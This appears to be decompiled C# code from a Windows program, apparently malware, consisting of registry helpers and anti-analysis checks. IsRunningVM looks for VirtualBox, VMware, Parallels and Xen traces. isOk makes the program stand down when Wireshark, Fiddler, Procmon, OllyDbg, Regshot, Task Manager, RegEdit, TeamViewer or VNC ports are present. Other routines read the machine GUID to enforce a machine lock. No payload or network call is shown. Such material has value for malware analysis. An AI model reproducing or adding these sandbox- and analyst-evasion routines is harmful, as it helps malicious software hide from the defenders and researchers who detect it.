// Token: 0x060000A6 RID: 166 RVA: 0x0000458C File Offset: 0x0000278C
public static bool IsRunningVM()
{
List <string> list = new List <string>
{
"vbox",
"vmware",
"parallels",
"parallels vm",
"xen",
"virtual",
"VM"
};
if (RegSystem.IsOneExist(new List <string>
{
"SOFTWARE\\Classes\\Virtual.Machine.VMC",
"SOFTWARE\\Wow6432Node\\Classes\\Virtual.Machine.VMC",
"Software\\Oracle\\VirtualBox",
"Software\\VMware, Inc."
}))
{
return(false);
}
string value = RegSystem.GetValue("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Disk\\Enum", "0");
string value2 = RegSystem.GetValue("HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System\\BIOS", "SystemManufacturer");
foreach (string text in list)
{
if (value.ToLower().Contains(text.ToLower()) || value2.ToLower().Contains(text.ToLower()))
{
return(true);
}
}
return(false);
}
// Token: 0x060000A4 RID: 164 RVA: 0x00004514 File Offset: 0x00002714
public static string SubIDMachine(string str)
{
int startIndex = str.IndexOf("{IDMachine}");
str = str.Remove(startIndex, 11);
str = str.Insert(startIndex, RegSystem.GetIDMachine());
return(str);
}
// Token: 0x060000A5 RID: 165 RVA: 0x00004548 File Offset: 0x00002748
public static bool IfMachineIDOk(string id)
{
string text = RegSystem.GetIDMachine();
text = text.Replace("-", "");
text = text.Trim();
char[] array = text.ToCharArray();
Array.Reverse(array);
text = new string(array);
return(id.Equals(text));
}
// Token: 0x06000099 RID: 153 RVA: 0x00004054 File Offset: 0x00002254
internal static string ReplaceWithSpecialConstants(string str)
{
if (str.ToUpper().Contains("{GB_UMDEK}"))
{
string[] registrySubDirs = RegSystem.GetRegistrySubDirs("HKCRU", "Software\\Cisco");
if (registrySubDirs == null)
{
return(null);
}
str = str.Replace("{GB_UMDEK}", registrySubDirs[0].ToUpper());
}
return(str);
}
// Token: 0x0600009E RID: 158 RVA: 0x000043EC File Offset: 0x000025EC
public static bool IsOneExist(List <string> regList)
{
using (List <string> .Enumerator enumerator = regList.GetEnumerator())
{
while (enumerator.MoveNext())
{
if (RegSystem.IsExist(enumerator.Current))
{
return(true);
}
}
}
return(false);
}
// Token: 0x0600009B RID: 155 RVA: 0x000042B4 File Offset: 0x000024B4
internal static bool isExistSubDirWithRegex(string root, string dir, string subDirRegex)
{
string[] registrySubDirs = RegSystem.GetRegistrySubDirs(root, dir);
if (registrySubDirs == null)
{
return(false);
}
string[] array = registrySubDirs;
for (int i = 0; i < array.Length; i++)
{
if (Regex.IsMatch(array[i], subDirRegex, RegexOptions.IgnoreCase))
{
return(true);
}
}
return(false);
}
// Token: 0x06000083 RID: 131 RVA: 0x00003D1C File Offset: 0x00001F1C
public static void init()
{
WindowsVersion.regValue = RegSystem.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
}
// Token: 0x06000078 RID: 120 RVA: 0x000036C4 File Offset: 0x000018C4
public static bool isOk()
{
return(!RegSystem.IsOneExist(new List <string>(Filters.regFilters)) && !System.IsProssRunning("HMA! Pro VPN") && !System.IsProssRunning("TeamViewer") && !System.IsProssRunning("TeamViewer_Desktop") && !System.IsProssRunning("TeamViewer_Service") && !System.IsProssRunning("DFServ") && !System.IsProssRunning("Fiddler") && !System.IsProssRunning("Wireshark") && !System.IsProssRunning("Capsa") && !System.IsProssRunning("ipscan") && !System.IsProssRunning("Procmon") && !System.IsProssRunning("OLLYDBG") && !System.IsProssRunning("Regshot-x64-Unicode.exe") && !System.IsProssRunning("Regshot-Unicode.exe") && !System.IsTaskMgrRunning() && !System.IsRegEditRunning() && !System.IsRunningVM() && !System.IsPortInUse(5900) && !System.IsPortInUse(5901) && !System.IsPortInUse(5902) && !System.IsPortInUse(5903) && !System.IsPortInUse(5904));
}
// Token: 0x0600009A RID: 154 RVA: 0x000040A0 File Offset: 0x000022A0
internal static bool isExistWithFormat(string regExp)
{
regExp = RegSystem.ReplaceWithSpecialConstants(regExp);
if (regExp == null)
{
return(false);
}
if (regExp.Contains("$"))
{
string[] array = regExp.Split(new char[]
{
'$'
});
string dir = array[0];
string subDirRegex = array[1];
return(RegSystem.isExistSubDirWithRegex("HKCRU", dir, subDirRegex) || RegSystem.isExistSubDirWithRegex("HKLM", dir, subDirRegex) || RegSystem.isExistSubDirWithRegex("HKCLR", dir, subDirRegex) || RegSystem.isExistSubDirWithRegex("HKUSERS", dir, subDirRegex) || RegSystem.isExistSubDirWithRegex("HKCUCO", dir, subDirRegex));
}
if (regExp.Contains("&"))
{
string[] array2 = regExp.Split(new char[]
{
'&'
});
string str = array2[0];
if (!array2[1].Contains("%"))
{
string regKey = array2[1];
return(RegSystem.GetValue("HKEY_CURRENT_USER\\" + str, regKey) != null || RegSystem.GetValue("HKEY_LOCAL_MACHINE\\" + str, regKey) != null || RegSystem.GetValue("HKEY_USERS\\" + str, regKey) != null || RegSystem.GetValue("HKEY_CURRENT_CONFIG\\" + str, regKey) != null || RegSystem.GetValue("HKEY_CLASSES_ROOT\\" + str, regKey) != null);
}
string[] array3 = array2[1].Split(new char[]
{
'%'
});
string regKey2 = array3[0];
string text = array3[1];
if (text.StartsWith("="))
{
text = text.Replace("=", "");
text = text.Trim();
string value = RegSystem.GetValue("HKEY_CURRENT_USER\\" + str, regKey2);
if (value == null)
{
value = RegSystem.GetValue("HKEY_LOCAL_MACHINE\\" + str, regKey2);
if (value == null)
{
value = RegSystem.GetValue("HKEY_USERS\\" + str, regKey2);
if (value == null)
{
value = RegSystem.GetValue("HKEY_CURRENT_CONFIG\\" + str, regKey2);
if (value == null)
{
value = RegSystem.GetValue("HKEY_CLASSES_ROOT\\" + str, regKey2);
if (value == null)
{
return(false);
}
}
}
}
}
return(text.Equals(value));
}
}
else if (RegSystem.IsExist(regExp))
{
return(true);
}
return(false);
}
// Token: 0x060000A3 RID: 163 RVA: 0x00004501 File Offset: 0x00002701
public static string GetIDMachine()
{
return(RegSystem.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid"));
}